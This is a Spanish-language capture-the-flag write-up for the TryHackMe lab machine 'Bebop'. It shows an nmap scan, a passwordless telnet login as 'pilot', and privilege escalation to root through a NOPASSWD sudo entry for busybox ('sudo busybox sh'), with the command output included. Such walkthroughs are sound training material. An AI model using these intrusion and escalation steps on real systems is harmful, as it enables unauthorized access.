[TryHackMe] Bebop

Hoy vamos a hackear la maquina de TryHackMe llamada Bebop. Podeis descargarla desde el siguiente enlace: Bebop



Empezamos con un nmap para ver que puertos tiene abiertos.

~ > nmap -A
Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-17 14:24 CEST
Nmap scan report for
Host is up (0.050s latency).
Not shown: 998 closed ports
22/tcp open  ssh     OpenSSH 7.5 (FreeBSD 20170903; protocol 2.0)
| ssh-hostkey: 
|   2048 5b:e6:85:66:d8:dd:04:f0:71:7a:81:3c:58:ad:0b:b9 (RSA)
|   256 d5:4e:18:45:ba:d4:75:2d:55:2f:fe:c9:1c:db:ce:cb (ECDSA)
|_  256 96:fc:cc:3e:69:00:79:85:14:2a:e4:5f:0d:35:08:d4 (ED25519)
23/tcp open  telnet  BSD-derived telnetd
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.52 seconds
Vemos que tiene abierto el puerto de telnet. Probamos a establecer conexion.

~ > telnet
Connected to
Escape character is '^]'.
Nos pide un login, ya que en la pagina inicial de la room nos indicaban que se nos ha asignado el codename "pilot" probamo con pilot :)

login: pilot
Last login: Mon Aug 17 12:25:35 from ip-10-9-24-208.eu-west-1.compute.internal
FreeBSD 11.2-STABLE (GENERIC) #0 r345837: Thu Apr  4 02:07:22 UTC 2019

Welcome to FreeBSD!

[pilot@freebsd ~]$ 
Estamos logueados sin necesidad de password!


[pilot@freebsd ~]$ ls
[pilot@freebsd ~]$ cat user.txt

Privilege Escalation

Ahora que estamos dentro, exploramos un poco el sistema y miramos si podemos hacer algo con "sudo".

[pilot@freebsd ~]$ sudo -l
User pilot may run the following commands on freebsd:
    (root) NOPASSWD: /usr/local/bin/busybox
Podemos usar busybox, el cual nos puede servir para escalar privilegios.

[pilot@freebsd ~]$ sudo busybox sh
# id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)


Ya como root miramos la flag...

# cd /root
# ls
.bash_history	.cshrc		.history	.k5login	.login		
.profile	root.txt
# cat root.txt 


Con esto, ya habriamos finalizado la maquina :)